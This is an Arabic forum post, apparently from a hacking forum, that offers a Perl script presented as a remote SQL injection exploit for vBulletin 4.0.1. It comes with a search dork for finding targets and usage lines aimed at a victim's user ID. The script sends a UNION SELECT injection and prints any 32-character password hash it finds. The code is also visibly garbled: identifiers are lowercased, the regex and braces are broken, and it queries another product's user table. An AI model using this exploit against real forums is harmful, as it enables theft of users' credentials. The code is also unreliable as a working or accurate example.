|
vBulletin™ Version 4.0.1 Remote SQL Injection Exploit السلام عليكم و رحمة الله الثغرة الجديدة الى طلعت باصدارات الفيبيلتن vBulletin قلت اضعها لا اتفوتكم الكود #!/usr/bin/perl use io::socket; print q{ ################################################## ##################### # vbulletin™ version 4.0.1 remote sql injection exploit # # by indoushka # # http://www.vbspiders.com/vb # # # # WinK hackerz (W@HAHERZ.ZZ) # # dork: Powered by vbulletin™ version 4.0.1 # ################################################## ##################### }; if (!$argv[2]) { print q{ usage: Perl vb4.0.1.pl host /directory/ victim_userid perl vb4.0.1.pl www.vb.com /forum/ 1 }; } $server = $argv[0]; $dir = $argv[1]; $user = $argv[2]; $myuser = $argv[3]; $mypass = $argv[4]; $myid = $argv[5]; print "------------------------------------------------------------------------------------------------\r\n"; print "[>] server: $server\r\n"; print "[>] dir: $dir\r\n"; print "[>] userid: $user\r\n"; print "------------------------------------------------------------------------------------------------\r\n\r\n"; $server =~ s/(http://)//eg; $path = $dir; $path .= "misc.php?sub=profile&name=0')+union+select+0,pass ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ,0+from%20deluxebb_users%20where%20(uid= '".$user ; print "[~] prepare to connect...\r\n"; $socket = io::socket::inet->new( proto => "tcp", peeraddr => "$server", peerport => "80") || die "[-] connection failed"; print "[+] connected\r\n"; print "[~] sending query...\r\n"; print $socket "get $path http/1.1\r\n"; print $socket "host: $server\r\n"; print $socket "accept: */*\r\n"; print $socket "connection: Close\r\n\r\n"; print "[+] done!\r\n\r\n"; print "--[ report ]------------------------------------------------------------------------------------\r\n"; while ($answer = <$socket>) { if ($answer =~/(w{32})/) { { if ($1 ne 0) { print "password is: ".$1."\r\n"; print "--------------------------------------------------------------------------------------\r\n"; } exit(); } } print "------------------------------------------------------------------------------------------------\r\n"; تحيآتى غ ـمزة هآكرز |
| الساعة الآن 03:50 PM |
[ vBspiders.Com Network ]